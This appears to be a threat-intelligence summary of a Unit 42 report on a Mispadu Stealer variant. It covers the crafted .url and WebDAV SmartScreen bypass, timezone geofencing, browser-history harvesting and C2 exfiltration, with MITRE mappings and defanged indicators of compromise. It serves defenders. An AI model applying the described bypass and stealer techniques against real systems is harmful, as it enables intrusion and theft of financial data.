Threat Research

Exploring the Latest Mispadu Stealer Variant

Unit42

Unit 42 identified a new Mispadu Stealer variant that uses crafted .url files and WebDAV (via rundll32) to bypass Windows SmartScreen and fetch malicious executables from a threat actor-controlled network share. The sample performs timezone-based geofencing, extracts browser history with SQLite to match targeted financial and crypto-related domains, and exfiltrates collected data via HTTP/S to C2 servers. #Mispadu #CVE-2023-36025

Keypoints

  • Researchers discovered a new Mispadu Stealer variant delivered via ZIP archives containing crafted .url files that point to network shares, allowing SmartScreen warnings to be bypassed.
  • The crafted .url uses a UNC path with an HTTP port (e.g., @80) to force WebDAV retrieval; execution is invoked through rundll32.exe to download and run the remote .exe.
  • The binary performs a timezone (UTC bias) check to geofence victims (targets primarily in Mexico/LATAM) and exits if outside targeted regions.
  • Mispadu copies Chrome/Edge history to %TEMP%, runs SQLite queries to extract recent URLs, and hashes split domain components (with a prepended fixed hash) to compare against 15 targeted hash groups.
  • If URLs match, the malware uploads data via HTTP/S POST to C2 (parameters include v1 language, v2 keyboard, v4 OS, v5 privileges, v6 architecture) and performs follow-up GET checks.
  • The sample uses AES via bcrypt.dll for string decryption and chooses HTTP for Windows 7/older or HTTPS for newer Windows versions during check-ins.
  • Known IOCs include domains (trilivok[.]com, plinqok[.]com), the IP 24.199.98[.]128, and multiple SHA256 file hashes including 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – Delivery via crafted .url files that cause users to execute remote binaries without SmartScreen warnings (‘the crafted .url file contains a link to a threat actor’s network share with a malicious binary… Windows will not display SmartScreen’s warning message.’)
  • [T1218] Signed Binary Proxy Execution – Use of rundll32.exe to invoke the WebDAV client and retrieve/execute remote payloads (‘the operating system will initiate a request through the rundll32.exe utility’)
  • [T1105] Ingress Tool Transfer – Retrieving malicious executables from a remote network share/WebDAV server (e.g., ‘the victim is redirected to the threat actor’s network share to retrieve and execute the malicious payload.’)
  • [T1124] System Time Discovery – Querying local time zone bias to implement geofencing and exit on non-targeted locales (‘queries the bias (or difference in minutes) between the local time zone and UTC… If the result is greater than 180, the malware will immediately exit.’)
  • [T1555.003] Credentials from Web Browsers – Accessing and querying local browser SQLite databases to extract URLs and potentially credentials (‘interact with the victim’s Microsoft Edge or Google Chrome browser history via SQLite. It copies these browser history databases to the %TEMP% directory, and it executes the following query…’)
  • [T1027] Obfuscated Files or Information – Use of AES encryption (via bcrypt.dll) to store/obfuscate strings and hinder analysis (‘selectively decrypts various strings… uses the AES encryption algorithm… through the bcrypt.dll library’)
  • [T1041] Exfiltration Over C2 Channel – Uploading collected data to C2 using HTTP/S POST requests with enumerated URI parameters (‘the malware proceeds to upload data via an HTTP/S POST request’)

Indicators of Compromise

  • [File Hash] sample malware SHA256 – 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea, bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789 (and 5 more hashes)
  • [Domain] C2 and distribution – trilivok[.]com, plinqok[.]com
  • [URL] C2 endpoints – hxxp://trilivok[.]com/4g3031ar0/cb6y1dh/it.php, hxxps://plinqok[.]com/3dzy14ebg/buhumo0/it.php
  • [IP / Path] direct payload hosts – 24.199.98[.]128/expediente38/…/8594605066.exe, 24.199.98[.]128/verificacion58/…/3072491614.exe
  • [Filename] payload example – 2456719228.exe (observed executed via crafted .url)

Unit 42’s technical procedure overview (concise):

The attack begins with a ZIP delivered to the victim (commonly via email or malicious download) containing a crafted .url file. That .url encodes a UNC path pointing to a threat-controlled network share and often includes an HTTP port (e.g., @80) so Windows invokes the WebDAV client instead of SMB; Windows then uses rundll32.exe to request and execute the remote executable, bypassing SmartScreen warnings.

Once executed, the Mispadu binary performs a system time (UTC bias) check to geofence targets and exits if outside intended regions. It decrypts internal strings using AES via bcrypt.dll, identifies %TEMP% for staging, and checks Windows version to choose HTTP (Windows 7/older) or HTTPS (newer) for C2 check-ins. The malware copies Chrome/Edge SQLite history files to %TEMP%, runs a SELECT query for URLs visited after Aug 29, 2023, splits domain strings by dots, prepends a fixed SHA256 constant, hashes the parts, and compares the results against 15 precomputed hash groups of targeted domains (financial and crypto services). If matches are found, it exfiltrates data via an HTTP/S POST to C2 (including parameters v1,v2,v4,v5,v6), then performs a final GET check-in.

Read more: https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint